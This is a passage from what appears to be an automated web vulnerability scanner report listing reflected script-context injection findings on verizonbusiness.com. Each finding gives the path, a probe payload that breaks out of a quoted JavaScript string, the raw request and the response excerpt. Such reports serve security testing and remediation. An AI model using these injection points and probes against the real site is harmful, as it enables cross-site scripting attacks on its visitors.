This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf1f8ca"%3b03e816d78eb HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Date: Wed, 17 Nov 2010 00:05:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf1f8ca";03e816d78eb";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.857. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68fc9'%3bf7e1a244bc was submitted in the REST URL parameter 1. This input was echoed as 68fc9';f7e1a244bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources68fc9'%3bf7e1a244bc/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:17:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40732
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources68fc9';f7e1a244bc/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.858. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e754"%3ba7a0d234bfa was submitted in the REST URL parameter 1. This input was echoed as 4e754";a7a0d234bfa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4e754"%3ba7a0d234bfa/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:17:36 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40734
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources4e754";a7a0d234bfa/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
h
...[SNIP]...

1.859. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ebd"%3b0f6f0c37f5 was submitted in the REST URL parameter 2. This input was echoed as 25ebd";0f6f0c37f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers25ebd"%3b0f6f0c37f5/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40342
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers25ebd";0f6f0c37f5/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//F
...[SNIP]...

1.860. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c5fa'%3b0fd002063 was submitted in the REST URL parameter 2. This input was echoed as 9c5fa';0fd002063 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers9c5fa'%3b0fd002063/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:04 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40340
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers9c5fa';0fd002063/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.861. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a84fb'%3b421489f7668 was submitted in the REST URL parameter 3. This input was echoed as a84fb';421489f7668 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdfa84fb'%3b421489f7668 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:22 GMT
Content-Type: text/html
Content-Length: 40344
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdfa84fb';421489f7668'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.862. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18115"%3b62ac14c8555 was submitted in the REST URL parameter 3. This input was echoed as 18115";62ac14c8555 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf18115"%3b62ac14c8555 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:13 GMT
Content-Type: text/html
Content-Length: 40344
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf18115";62ac14c8555";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.863. http://www.verizonbusiness.com/se/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25814"%3b61e08b5702e was submitted in the REST URL parameter 1. This input was echoed as 25814";61e08b5702e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se25814"%3b61e08b5702e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se25814";61e08b5702e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.864. http://www.verizonbusiness.com/se/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf096'%3b3131f4d27f6 was submitted in the REST URL parameter 1. This input was echoed as cf096';3131f4d27f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /secf096'%3b3131f4d27f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40606
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/secf096';3131f4d27f6/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.865. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20bc9"%3b121f436987f was submitted in the REST URL parameter 1. This input was echoed as 20bc9";121f436987f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se20bc9"%3b121f436987f/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se20bc9";121f436987f/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.866. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61f23'%3be99f480ab8f was submitted in the REST URL parameter 1. This input was echoed as 61f23';e99f480ab8f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se61f23'%3be99f480ab8f/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/se61f23';e99f480ab8f/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.867. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aead"%3b77920b07542 was submitted in the REST URL parameter 2. This input was echoed as 1aead";77920b07542 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutions1aead"%3b77920b07542/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:59:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41122
Date: Wed, 17 Nov 2010 00:59:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se/solutions1aead";77920b07542/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.868. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce82f'%3b6173aab2f5f was submitted in the REST URL parameter 2. This input was echoed as ce82f';6173aab2f5f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutionsce82f'%3b6173aab2f5f/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
